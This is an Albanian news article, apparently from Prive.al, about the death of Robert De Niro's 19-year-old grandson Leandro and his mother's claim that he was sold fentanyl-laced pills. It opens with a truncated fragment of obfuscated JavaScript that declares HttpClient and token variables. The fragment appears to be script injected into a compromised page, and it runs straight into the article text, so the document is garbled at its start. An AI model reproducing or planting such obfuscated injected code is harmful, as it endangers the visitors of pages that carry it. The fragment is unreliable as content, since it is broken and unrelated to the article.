;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shkaku problematik që çoi në vdekjen e parakohshme të nipit të Robert De Niro

By

Vajza e aktorit tw famshwm, Robert De Niro duket se ka folur për shkakun e vdekjes së parakohshme të djalit të saj Leandros.

Leandro De Niro Rodriguez u njoftua i vdekur të dielën (2 korrik). Ai ishte 19 vjeç dhe ishte shfaqur si aktor në filmat e vitit 2018 A Star is Born dhe Cabaret Maxime.

Pasi u publikua lajmi për vdekjen e tij, gjyshi i Leandros, aktori  Robert De Niro, lëshoi një deklaratë duke shprehur “shqetësimin e tij të thellë” për humbjen e papritur të familjes.

Drena, njëherazi aktore, ditët e fundit ka postuar disa fotografi të Leandros në rrjetet sociale, duke ndarë pikëllimin e saj me fansat dhe miqtë.

Në një postim homazh, ajo ndau mirënjohjen e saj për njerëzit që kishin dërguar mesazhe mbështetjeje që kur ajo njoftoi vdekjen e Leandros.

Sipas një raporti të HuffPost, Drena iu përgjigj një komenti në postim me një pretendim se si vdiq Leandro.

“Dikush i shiti atij pilula të përziera me fentanil, të cilat ata e dinin se ishin të përziera, por gjithsesi ia shitën atij, kështu që për të gjithë këta njerëz që ende janë duke shitur dhe blerë këtë m**, djali im është zhdukur përgjithmonë”, thuhet në përgjigjen e saj. .

Shkaku zyrtar i vdekjes ende nuk është bërë i ditur nga autoritetet. /Prive.al

Artikuj të ngjashëm